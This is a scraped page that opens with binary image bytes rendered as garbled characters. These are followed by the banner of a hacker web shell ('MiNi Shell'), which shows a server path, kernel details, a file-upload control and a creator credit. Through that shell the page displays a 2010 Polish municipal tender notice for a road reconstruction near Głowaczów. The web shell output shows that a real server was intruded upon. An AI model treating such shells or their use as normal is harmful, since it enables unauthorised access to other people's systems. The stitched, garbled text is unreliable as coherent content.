JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/17559-N-2010.html

<p class="kh_header"><b>Głowaczów: Przebudowa drogi gminnej nr 3426014 relacji Mariampol - Grabnowola w gminie Głowaczów</b><br>
<b>Numer ogłoszenia: 17559 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Głowaczów , ul. Rynek 35, 26-903 Głowaczów, woj. mazowieckie, tel. 048 6231023, faks 048 6231217.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glowaczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi gminnej nr 3426014 relacji Mariampol - Grabnowola w gminie Głowaczów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania inwestycyjnego pt. Przebudowa drogi gminnej nr 3426014 relacji Mariampol - Grabnowola w gminie Głowaczów. Wszystkie roboty budowlane w ramach niniejszego zamówienia muszą być wykonane zgadnie z dokumentacją projektowo-budowlaną oraz specyfikacją techniczną wykonania i odbioru robót. Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji, którą stanowią załączniki do niniejszej SIWZ:
-	Projekt budowlany i projekt wykonawczy - droga,
-	Projekt budowlano-wykonawczy - przyłącze oświetlenia drogowego
-	Szczegółowe Specyfikacje Techniczne,
-	2 szt przedmiarów robót  (droga + elektryka).
2.	Przedmiot zamówienia obejmuje wykonanie remontu istniejącej drogi gminnej o dł. 819,22 mb tj. od km 2+213,0 do km 3+0,32,22, położonej na działkach o nr ewidencyjnych - 938 (Mariampol), 351 (Kolonia Grabnowolska) i 155 (Dąbrówki Grabnowolskie).  
3.	 W zakres przedmiotu zamówienia nie wchodzi wykonanie budowy drogi łącznikowej  na działkach oznaczonych nr ewidencyjnymi 128 i 325, co zostało uwzględnione w dokumentacji projektowo-budowlanej. Odcinek tej drogi łącznikowej będzie budowany w II etapie.
4.	W zakres wykonania przedmiotu zamówienia wchodzi:
-	przebudowa istniejącej jezdni o nawierzchni utwardzonej kruszywem naturalnym, 
-	regulacja poboczy ziemnych (obustronnych o szer. 50 cm) i skarp korpusu drogowego,
-	uporządkowanie systemu gromadzenia i odprowadzenia wód opadowych poprzez budowę obustronnych rowów bocznych - trapezowych, 
-	budowa zjazdów indywidualnych - 43 szt, 
-	przebudowa skrzyżowania z drogą powiatową i budowa przepustu o średnicy 60 cm i dł. 12 mb, 
-	budowa dwóch peronów przystankowych o dł. 20 i 23 mb, 
-	budowa chodników o szer. 1,5 m, 
-	budowa nawierzchni jezdni,
-	oznakowanie wyremontowanej drogi znakami pionowymi - 7 szt i znakami poprzecznymi poprzez malowanie linii na skrzyżowaniach i przejściach dla pieszych,  
-	przebudowa oświetlenia drogi: budowa linii napowietrznej AsXSn 2 x 35 mm2 - 261 m, montaż stanowisk słupowych krańcowych, montaż stanowisk słupowych przelotowych - 6 szt, montaż opraw sodowych 70 W - 8 szt, montaż szafy oświetleniowej - 1 szt, wykonanie uziemień.
5.	W ramach  budowy nawierzchni jezdni należy wykonać: mechaniczne wykonanie koryta  jezdni o gł. 40 cm, dł. 827,36 m i szer. 5,2 m, profilowanie i zagęszczenie mechaniczne podłoża pod warstwy konstrukcyjne nawierzchni, zagęszczenie warstwy odsączającej z piasku - 10 cm po zagęszczeniu,  podbudowa z kruszyw łamanych (dwie warstwy) - warstwa dolna 0/63 - gr. warstwy 12 cm po zagęszczeniu, warstwa górna 0/31,5 - gr. 8 cm po zagęszczeniu, położenie nawierzchni z mieszanek mineralno bitumicznych asfaltowych - warstwa wiążąca wykonana z betonu asfaltowego 0/16 - o grubości 4 cm, warstwa ścieralna wykonana z betonu asfaltowego 0/12,8 - o grubości - 4 cm.
6.	Ponadto w ramach niniejszego zamówienia Wykonawca  na swój koszt zobowiązany jest do: 
-	udzielenia minimum 3 lata gwarancji jakości na wykonane roboty budowlane i użyte do wykonania zamówienia materiały i wyroby budowlane,
-	wykonania dokumentacji inwentaryzacji geodezyjnej powykonawczej i przekazania jej Zamawiającemu  na minimum 1 dzień przed terminem odbioru robót.
-	przedmiot zamówienia należy wykonać z nowych materiałów budowlanych, na które Wykonawca dostarczy certyfikaty lub atesty dopuszczenia do użytkowania na każde żądanie inspektora nadzoru oraz przekaże je Zamawiającemu w dniu odbioru przedmiotu zamówienia,      
-	po zakończeniu robót, ale przed terminem ich odbioru, należy uporządkować plac budowy i oddać go w należytym stanie, nie gorszym niż przed rozpoczęciem robót,
7.  Postanowienia dotyczące dokumentacji projektowej:
1.	Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnie z dokumentacjami projektowymi i zachowaniem wskazanej przez Projektanta technologii oraz zgodnie z zasadami wiedzy technicznej, normami, warunkami technicznego wykonania i odbioru robót, wskazaniami Zamawiającego  i obowiązującymi przepisami.
2.	Wykonawca ma obowiązek zapoznać się z dokumentacją projektową i złożyć na piśmie dostrzeżone błędy lub uchybienia, które mogą mieć wpływ na prawidłowe wykonanie przedmiotu zamówienia.
3.	W przypadku wystąpienia okoliczności powodujących konieczność wprowadzenia zmian w dokumentacji projektowej Wykonawca ma obowiązek pisemnego powiadomienia Zamawiającego o tym fakcie w terminie do 3 dni od dnia wystąpienia w/w okoliczności.
4.	Nie dopuszcza się możliwości złożenia oferty przewidującej odmienny sposób wykonania przedmiotu zamówienia niż określony w dokumentacjach projektowych (drogi i oświetlenia).  
8. Postanowienia dotyczące wykonania przedmiotu umowy:
1)	Przedmiot zamówienia należy wykonać zgodnie z dokumentacjami projektowymi tj. projektem budowlano-wykonawczym oraz specyfikacją techniczną wykonania i odbioru robót. Szczegółowo z dokumentacjami można się zapoznać przed złożeniem oferty. Dokumentacja jest dostępna w pokoju nr 12 lub 3 w siedzibie Zamawiającego. 
2)	Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej terenu, objętego przyszłymi robotami budowlanymi w ramach niniejszego przedmiotu zamówienia w celu zapoznania się z warunkami realizacji tych robót.
3)	Przekazanie placu budowy - będzie następować w obecności Wykonawcy, Zamawiającego i Inspektora nadzoru w terminie uzgodnionym przez strony.
4)	Wykonawca zobowiązany jest do pisemnego powiadomienia Zamawiającego o okolicznościach mogących mieć wpływ na niedotrzymanie terminu wykonania przedmiotu zamówienia w nieprzekraczalnym terminie do 7 dni od dnia wystąpienia w/w okoliczności.
5)	Wszystkie napotkane przewody podziemne Wykonawca winien zabezpieczyć. W przypadku ich uszkodzenia należy niezwłocznie zawiadomić o tym fakcie Zamawiającego, Inspektora Nadzoru oraz inne zainteresowane podmioty oraz dokonać  naprawy uszkodzeń na własny koszt.
6)	Prowadzone roboty budowlane muszą odbywać się zgodnie z przepisami prawa budowlanego, BHP,  ppoż., sanitarnymi i przepisami ochrony środowiska, pod nadzorem osób posiadających uprawnienia do prowadzenia robót.
7)	Wszystkie materiały i wyroby budowlane użyte do wykonania przedmiotu zamówienia  muszą być nowe oraz muszą być dopuszczone do stosowania na terenie RP, a także muszą spełniać warunki określone w ustawie z dnia 07 lipca 1994r. Prawo budowlane ( jednolity tekst Dz. U. z 2006r., Nr 156, poz. 1118 z późn. zm.) oraz w Rozporządzeniu Ministra Infrastruktury w sprawie sposobów deklarowania zgodności wyrobów budowlanych oraz sposobu znakowania ich znakiem budowlanym z 11 sierpnia 2004r. (Dz. U. z 2004r., Nr 198, poz. 2041 z późn. zm.)oraz muszą spełniać warunki określone w ustawie z dn. 16 kwietnia 2004 r o wyrobach budowlanych (Dz.U. Nr. 92, poz. 881).
8)	Wykonawca ma obowiązek opracowania projektu czasowej organizacji ruchu oraz zorganizowania placu budowy, zabezpieczenia miejsca wykonywanych  robót, dbania o stan techniczny i prawidłowość oznakowania przez cały czas trwania realizacji zadania.
9)	Wykonawca jest zobowiązany do zabezpieczenia terenu robót przed osobami postronnymi, a w szczególności do przeciwdziałania wypadkom osób trzecich. Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone osobom trzecim w wyniku prowadzonych prac, od dnia przekazania placu budowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.90-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości 15.000,00 zł, słownie: piętnaście tysięcy zł, przed upływem składania ofert.
2.	 Wykonawca wnosi wadium: 
-	w pieniądzu - wpłata przelewem na  rachunek bankowy Zamawiającego - 57 9125 0005 0000 0374 2000 0080,    
-	 w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że  poręczenie kasy jest  zawsze poręczeniem pieniężnym,
-	w gwarancjach bankowych,
-	w gwarancjach ubezpieczeniowych,
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.).
3.	Uwaga: Wadium wnoszone w formie niepieniężnej musi zawierać zapis art. 46 ust. 4a  ustawy Pzp.  
4.	Dokument gwarancji w formie nie pieniężnej - musi zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
5.	Gwarancje wnoszone w innej formie niż pieniężna należy złożyć w formie oryginału w kasie Urzędu Gminy - pokój nr 3,  .
8.6.	 Do oferty należy dołączyć kserokopię wniesionego wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy zgodnie z art. 22 ust. 1 ustawy Pzp,  spełniają następujące warunki dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
2)	posiadania wiedzy i doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wy?konania zamówienia;
4)	sytuacji ekonomicznej i finansowej.   
2.	Wykonawca nie podlega wykluczeniu na podstawie art. 24 ust 1 i 2 ustawy Pzp.

3.	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 
3.1.	Na potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności Wykonawca  przedkłada:
-	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;
3.2. Na potwierdzenie posiadania wiedzy i doświadczenia  Wykonawca musi wykazać, że:
-	wykonał co najmniej dwie roboty budowlane w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Każda wykonana robota budowlana winna odpowiadać swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem jej wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo. Zamawiający wymaga wykonania co najmniej dwóch robót budowlanych w zakresie budowy, przebudowy, remontu dróg o wykonaniu nawierzchni z betonu asfaltowego, każda o długości  min. 819,22 mb lub 4 260 m2, 
3.3. Na potwierdzenie dysponowania odpowiednim potencjałem technicznym oraz osobami
           zdolnymi do wy?konania zamówienia Wykonawca udokumentuje, że:
-	posiada niezbędne do wykonania zamówienia narzędzia, wyposażenie zakładu i urządzenia dostępne Wykonawcy w celu realizacji zamówienia wraz z informacja o podstawie dysponowania tymi zasobami,   
-	dysponuje osobami, które będą uczestniczyć w kierowaniu robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu przewidzianych do wykonania czynności oraz informacji o podstawie do dysponowania tymi osobami.  Należy wykazać kierownika budowy oraz kierowników robót branży drogowej i elektrycznej oraz przedłożyć posiadane przez te osoby kwalifikacje - uprawnienia i aktualne zaświadczenie o przynależności do izby samorządu zawodowego z aktualnym ubezpieczeniem od odpowiedzialności cywilnej; 
-	kierownikiem budowy i kierownikiem robót  branży drogowej może być ta sama osoba posiadająca uprawnienia do kierowania i nadzorowania  robotami w zakresie dróg lub konstrukcyjno-budowlane bez ograniczeń. 
-	kierownik robót elektrycznych - posiada uprawnienia do kierowania robotami w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych.
3.4. Na potwierdzenie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia  Wykonawca  przedkłada:
-	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową  Wykonawcy - wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert - w wysokości nie mniejszej niż kwota brutto podana przez Wykonawcę w ofercie.  
4. Na potwierdzenie, że nie podlega wykluczeniu Wykonawca składa oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi  do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.  	
6. 	Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana zgodnie z formułą: < spełnia/nie spełnia>, na podstawie informacji zawartych w oświadczeniach i dokumentach złożonych przez Wykonawcę w ofercie, których załączenie jest wymagane przez Zamawiającego zgodnie z pkt 6 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu,  musi wraz z ofertą złożyć następujące dokumenty, oświadczenia, zaświadczenia i informacje: 
1.	Wypełniony formularz Zamawiającego <Oferta Przetargowa> - zał. nr 1 SIWZ;
2.	Oświadczenie o spełnieniu warunków udziału w postępowaniu - art. 22 ust. 1 ustawy Pzp - zał. nr 2  SIWZ;  
3.	Oświadczenie o braku podstaw do wykluczenia na podst. art. 24 ust. 1 i 2 ustawy Pzp - zał. nr 3 SIWZ;
4.	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;
5.	Wykaz robót  budowlanych w zakresie niezbędnym do wykazania  spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - zał. nr 4 SIWZ; 
6.	Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - zał. nr 5 SIWZ;
7.	Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, a w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacje o podstawie do dysponowania tymi osobami - zał. nr 6 SIWZ;
8.	Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;  
9.	Informację banku lub  spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy - wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.  
10.	 Informację o zakresie rzeczowo-finansowym robót zleconych <Podwykonawcom>, w przypadku nie korzystania z podwykonawców należy wpisać -NIE DOTYCZY - zał. nr 7 SIWZ .
11.	Pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów.
12.	Kosztorys ofertowy uproszczony - wypełniony przedmiar robót, który ma jedynie charakter pomocniczy przy sprawdzaniu ceny oferty. W kosztorysie należy zamieścić informację  dotyczącą ceniy 1 roboczogodziny oraz zastosowanie % narzutów: kosztów pośrednich i zysku.
13.	Pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik. Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.
14.	Wniesienie wadium. Kopia dokumentu potwierdzającego wniesienie wadium powinna być dołączona do oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glowaczow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Głowaczów, 26-903 Głowaczów, ul. Rynek 35 pokój nr 12 lub 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2010 godzina 10:00, miejsce: Urząd Gminy Głowaczów, 26-903 Głowaczów, ul. Rynek 35 - pokój nr 17 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com